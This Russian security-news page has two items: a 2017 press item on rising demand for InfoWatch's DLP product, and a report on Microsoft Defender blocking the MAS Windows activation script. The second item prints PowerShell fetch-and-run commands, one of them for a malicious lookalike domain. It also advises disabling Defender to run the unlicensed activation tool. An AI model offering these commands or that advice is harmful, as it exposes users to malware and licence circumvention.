Спрос на внедрение DLP-решения InfoWatch Traffic Monitor вырос на 20 %

Спрос на внедрение DLP-решения InfoWatch Traffic Monitor вырос на 20 %

Спрос на внедрение DLP-решения InfoWatch Traffic Monitor вырос на 20 %

Группа компаний (ГК) InfoWatch отмечает рост числа проектов внедрений решения для предотвращения утечек конфиденциальной информации и защиты бизнеса от внутренних угроз (DLP-системы) InfoWatch Traffic Monitor на 20 % в 2017 году. Кроме того, в два раза увеличился спрос на обновление до последней версии DLP-продукта со стороны действующих клиентов InfoWatch.

«В 2017 году мы расширили присутствие на ключевых зарубежных и российских рынках сбыта, открыв локальные представительства полного цикла на Ближнем Востоке и в Юго-Восточной Азии и офисы в Иннополисе и Тюмени, — отметил директор по продажам InfoWatch Константин Левин. — Прямое взаимодействие с заказчиками и активное сотрудничество с партнерами существенно увеличили клиентскую базу, а интерес постоянных клиентов к обновлениям продукта считаем одним из главных признаков доверия к решениям компании».

 

Более 90 % реализованных в 2017 году проектов InfoWatch Traffic Monitor пришлось на девять отраслей. Доля потребителей из числа организаций промышленного сектора увеличилась за год в два раза, в результате производственные компании стали главным потребителем флагманских решений InfoWatch – на них пришлось около четверти всех реализованных проектов. Помимо компаний промышленного сектора, выросло число заказчиков внедрений DLP-системы InfoWatch в финансово-кредитной и нефтегазовой отрасли, сферах торговли, строительства и информационных технологий, в то время как снизились доли проектов в государственном секторе, энергетическом комплексе, сфере логистики и транспорта.

Константин Левин добавил, что заказчики все чаще пользуются решениями «под ключ» — персонализированными с учетом потребностей и особенностей бизнес-процессов клиента продуктами с последующей технической поддержкой. Он подчеркнул, что компания предоставляет широкий спектр услуг полного цикла: от аудита информационной безопасности организации и оказания консультативных услуг до пилотирования и полноценного внедрения решения в инфраструктуру заказчика, а также обеспечения непрерывной сервисной поддержки.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru